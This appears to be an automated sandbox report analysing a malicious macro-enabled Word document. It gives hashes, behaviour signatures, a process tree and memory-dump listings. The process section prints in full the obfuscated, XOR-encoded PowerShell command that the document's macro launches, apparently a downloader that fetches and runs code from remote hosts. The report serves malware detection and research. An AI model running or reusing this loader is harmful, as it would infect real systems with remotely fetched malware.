Analysis

  • max time kernel
    122s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags
    arch:x64, arch:x86, image:win7-20231129-en, locale:en-us, os:windows7-x64, system
  • submitted
    19-05-2024 10:18

General

  • Target

    59e447e4f4dc430a2fa225dda10aeb20_JaffaCakes118.doc

  • Size

    206KB

  • MD5

    59e447e4f4dc430a2fa225dda10aeb20

  • SHA1

    1582f27a27a5ceb1066e50e2ded5088b2dd9c118

  • SHA256

    666edb5d9868c952bd0fa5ed0741e23cd81f0c74832c73186fc6e1304d4e39e1

  • SHA512

    2c3b047038e2af63a45eb0a429f0a3350f4faf42c9be0e70ec82997ac0c50e6466341da5c1347458f995d835a7a3e3899094c7ad1b38e58e79facc39acd4e3f3

  • SSDEEP

    3072:wH9nBf4SuEjAhmAMOc7kkkko1rkGuF3tBInxGGq5fyXJm9YBmjDsl5zZMr:wFVeEsjdXRC3jexGG6kYWofsx0

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\59e447e4f4dc430a2fa225dda10aeb20_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2088
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowersHELL.exe
      PowersHELL .( $shElliD[1]+$ShEllId[13]+'X')( "$(SEt-iteM 'vaRIabLe:oFS' '')"+ [strINg]('30Y84N127S125w7<84Y95N77R23j85S88N80%95w89N78%26N116j95K78w20<109K95<88R121<86R83K95K84j78R1S30S112<83S81R7K29N82w78R78R74K0S21Y21%77w77w77K20K67w95S78j91R84%85R78w82%95N72N73j78%95w76Y95K20S89N85S87S21j98<73N12R110<106w77R84j123%123N112S21S122S82w78j78R74Y0N21<21%92S86<95K77K95S72N20m74R86j21<74K79m88K21m73%3Y3%15K15m12N87%21%122S82S78<78Y74Y0Y21Y21Y77w77S77K20w82%85K78N95<86K89Y91K74N83w78w91R86m20<72N79S21N92m12%124m120<112Y126w21w122R82<78w78j74R0Y21K21<94S89%20%91w87S95w93Y78Y20Y89S85K87%21w77K74<23j89N85Y84%78S95Y84S78Y21j85m121K14Y93N67N14N91Y125R118m21%122<82m78m78%74R0%21K21N77K77K77m20j91Y72R87<91N84<83w78%85j79<72<20K89<85S87K21R81m79j116Y117m75K115w21Y29Y20<105S74m86m83S78S18m29m122K29%19K1S30j82m117j98R26S7K26Y29j8%3<11N29S1K30S86w104Y75N7K30R95m84w76%0S78N95%87w74N17<29N102m29j17S30N82N117w98S17R29%20Y95%66<95S29j1m92Y85%72%95R91m89S82<18%30m126Y98R107%26<83j84w26<30<112S83R81w19j65R78N72K67K65w30j84<127R125N20N126K85m77R84N86<85<91w94Y124N83Y86R95%18Y30R126K98K107S22j26K30N86R104K75K19K1S105j78%91S72m78w23w106w72N85R89R95S73%73N26S30K86Y104%75<1%88S72Y95N91S81S1K71N89w91<78K89N82%65N71<71'-split 'w' -split 'Y'-sPlIt 'K' -sPlIT '<'-sPlIt 'N' -sPLiT 's'-split'r'-SpLit '%' -SPlit 'M'-SPlit 'J'|foREaCH-OBjEct{ [CHar] ( $_-BXOr 0x3a )}) +" $(SEt 'ofs' ' ')")
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2576
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2672

    Network

    MITRE ATT&CK Enterprise v15

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      374890c0f5cd5e51056603ff37cf608b

      SHA1

      b86e73edeedc72f6a7188145db7461cbb8d034e5

      SHA256

      9e91b0e7e3d0067eb89724846a4567d513a097549adc88d4f6443a2e4785ae42

      SHA512

      ff9a27d4af2e2428bdf307b6d379f1a2e9a858229ca1d3f836bb50202cf46fefa3c77df2d45db66e6592a105653b028740ecfdce26867c145cf06b6612518f4d

    • memory/2088-36-0x0000000000570000-0x0000000000670000-memory.dmp

      Filesize

      1024KB

    • memory/2088-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2088-5-0x0000000000570000-0x0000000000670000-memory.dmp

      Filesize

      1024KB

    • memory/2088-6-0x0000000000570000-0x0000000000670000-memory.dmp

      Filesize

      1024KB

    • memory/2088-7-0x0000000000570000-0x0000000000670000-memory.dmp

      Filesize

      1024KB

    • memory/2088-43-0x0000000000570000-0x0000000000670000-memory.dmp

      Filesize

      1024KB

    • memory/2088-8-0x0000000000570000-0x0000000000670000-memory.dmp

      Filesize

      1024KB

    • memory/2088-42-0x0000000000570000-0x0000000000670000-memory.dmp

      Filesize

      1024KB

    • memory/2088-41-0x0000000000570000-0x0000000000670000-memory.dmp

      Filesize

      1024KB

    • memory/2088-15-0x0000000000570000-0x0000000000670000-memory.dmp

      Filesize

      1024KB

    • memory/2088-40-0x0000000000570000-0x0000000000670000-memory.dmp

      Filesize

      1024KB

    • memory/2088-14-0x0000000000570000-0x0000000000670000-memory.dmp

      Filesize

      1024KB

    • memory/2088-79-0x000000007174D000-0x0000000071758000-memory.dmp

      Filesize

      44KB

    • memory/2088-2-0x000000007174D000-0x0000000071758000-memory.dmp

      Filesize

      44KB

    • memory/2088-20-0x0000000000570000-0x0000000000670000-memory.dmp

      Filesize

      1024KB

    • memory/2088-28-0x0000000000570000-0x0000000000670000-memory.dmp

      Filesize

      1024KB

    • memory/2088-26-0x0000000000570000-0x0000000000670000-memory.dmp

      Filesize

      1024KB

    • memory/2088-23-0x0000000000570000-0x0000000000670000-memory.dmp

      Filesize

      1024KB

    • memory/2088-32-0x0000000000570000-0x0000000000670000-memory.dmp

      Filesize

      1024KB

    • memory/2088-17-0x0000000000570000-0x0000000000670000-memory.dmp

      Filesize

      1024KB

    • memory/2088-11-0x0000000000570000-0x0000000000670000-memory.dmp

      Filesize

      1024KB

    • memory/2088-37-0x0000000000570000-0x0000000000670000-memory.dmp

      Filesize

      1024KB

    • memory/2088-78-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2088-59-0x0000000000570000-0x0000000000670000-memory.dmp

      Filesize

      1024KB

    • memory/2088-60-0x000000007174D000-0x0000000071758000-memory.dmp

      Filesize

      44KB

    • memory/2088-0-0x000000002FA01000-0x000000002FA02000-memory.dmp

      Filesize

      4KB

    • memory/2576-51-0x00000000054F0000-0x0000000005542000-memory.dmp

      Filesize

      328KB

    • memory/2576-52-0x0000000005470000-0x0000000005485000-memory.dmp

      Filesize

      84KB